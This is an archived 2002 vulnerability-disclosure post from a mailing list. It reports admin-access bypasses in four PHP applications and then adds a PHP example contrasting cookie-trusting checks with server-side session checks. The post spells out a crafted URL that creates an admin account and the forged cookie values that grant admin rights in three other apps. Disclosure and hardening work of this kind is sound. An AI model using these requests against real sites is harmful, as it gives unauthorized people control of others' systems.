Vulnerability Development mailing list archives

Multiple holes in PHP services.


From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 11 Feb 2002 16:08:49 +0100

The URL http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save allows creating an admin access (nick: test, password: test) on an nWebSystems Voting System site.

More details in French:
http://balteam.multimania.com/Tuts/nwebsystemsvs.txt

FORUMPERSO v2.1 :
Anyone can be admin if he sends the cookies "pass_ok[0]","1" and "pass_ok[1]","admin" to the page http://www.host.com/connect.php3?id_forum=&addr=install.php3.

PHPMyAnnu v2.02 :
Anyone can be admin if he sends the cookie "phpmyannu_admin_ok","yes" to the page http://www.host.com/path/admin/admin.php3.

phpMyNewsletter v0.6.6 :
Anyone can be admin if he sends the cookie "adminnews","true" to the page http://www.host.com/admin.php3.

More details in French:
http://balteam.multimania.com/Tuts/4cookieholes.txt

frog-m@n
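
An added example, not part of the original post and not code from any of the applications it names: the three cookie issues reported above share one pattern, an admin decision read from a value the client supplies. The sketch sets that pattern beside a server-side session lookup. Only the `adminnews` cookie name comes from the post; the `sid` cookie, the in-memory `$store`, the demo user and all function names are assumptions made for illustration.

```php
<?php
// Added illustration, not code from the applications named in the post.
// Assumed weak pattern: the admin decision is read from a client-supplied cookie.
function is_admin_weak(array $cookies): bool
{
    return ($cookies['adminnews'] ?? '') === 'true';
}

// Hardened pattern: the cookie holds only a random token; identity and role
// stay in server-side state created after the password has been verified.
function login(array &$store, array $users, string $user, string $password): ?string
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user]['hash'])) {
        return null;
    }
    $token = bin2hex(random_bytes(32));
    // Store a hash of the token so a leaked store does not yield live tokens.
    $store[hash('sha256', $token)] = [
        'user'    => $user,
        'admin'   => $users[$user]['admin'],
        'expires' => time() + 1800,
    ];
    return $token;
}

function is_admin(array $store, array $cookies): bool
{
    $token = $cookies['sid'] ?? '';
    // Reject array-valued cookies (name[0]=...) and empty values outright.
    if (!is_string($token) || $token === '') {
        return false;
    }
    $session = $store[hash('sha256', $token)] ?? null;
    return $session !== null && $session['expires'] > time() && $session['admin'] === true;
}

// Constructed demo data (hypothetical user and password).
$users = ['root' => ['hash' => password_hash('constructed-demo-pw', PASSWORD_DEFAULT), 'admin' => true]];
$store = [];
$forged = ['adminnews' => 'true', 'sid' => ['admin']];

var_dump(is_admin_weak($forged));        // weak check accepts the client's claim
var_dump(is_admin($store, $forged));     // hardened check finds no server-side session
$token = login($store, $users, 'root', 'constructed-demo-pw');
var_dump(is_admin($store, ['sid' => $token]));  // session created by a real login
```

PHP's built-in session handling gives the same property when the role is written to `$_SESSION` only after authentication and is never derived from `$_COOKIE` or request parameters.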


